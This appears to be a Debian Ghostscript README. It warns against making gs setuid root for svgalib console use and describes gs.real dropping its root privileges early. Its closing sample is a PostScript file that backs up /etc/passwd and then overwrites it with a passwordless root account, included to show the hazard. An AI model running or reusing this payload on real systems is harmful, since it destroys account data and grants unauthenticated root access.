1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
*******************
Ghostscript setuid?
*******************
For ghostscript to be able to access the linux vga console (using
svgalib), it needs to run as root (or be setuid root), since root
privileges are required to initialize the console.
But, as one can open files in read AND write mode in gs, this
will make a mockery of security (see sample file below).
Now, on Debian systems, /usr/bin/gs is a wrapper that executes
/usr/lib/ghostscript/M.NN/gs.real with custom commandline arguments
(like setting the papersize correctly). This file should not be setuid,
since the user can easily force it to execute any file setuid.
Instead, if you often use svgalib, you may decide to make
/usr/lib/ghostscript/M.NN/gs.real setuid:
chmod u+s /usr/lib/ghostscript/M.NN/gs.real
To avoid security holes, the root privileges should be given up
as soon as possible; so gs.real behaves as follows:
if (running with root privileges) then
if (running on a vga console) then
initialize the console;
give up the privileges;
continue with the initialization;
The initialization of the console will cause gs to generate some
diagnostic messages on stderr.
********************
Try following ps-file as root, without option "-dSAFER".
Hint: make a backup of /etc/passwd to a safe place first.
%****** Cut here **
%!PS
%first, make backup in /etc/passwd.ps.old
(/etc/passwd) (r) file /passwd exch def
(/etc/passwd.ps.old) (w) file /passwdb exch def
/s (hello) def
{passwd s readstring
{passwdb s writestring pop}
{passwdb s writestring pop exit} ifelse
} loop
%then adjust /etc/passwd
passwdb closefile
passwdb closefile
(/etc/passwd) (w) file /passwd exch def
passwd (root::0:0:root:/root:/bin/bash\012) writestring
passwd closefile
%****** Cut here **
|
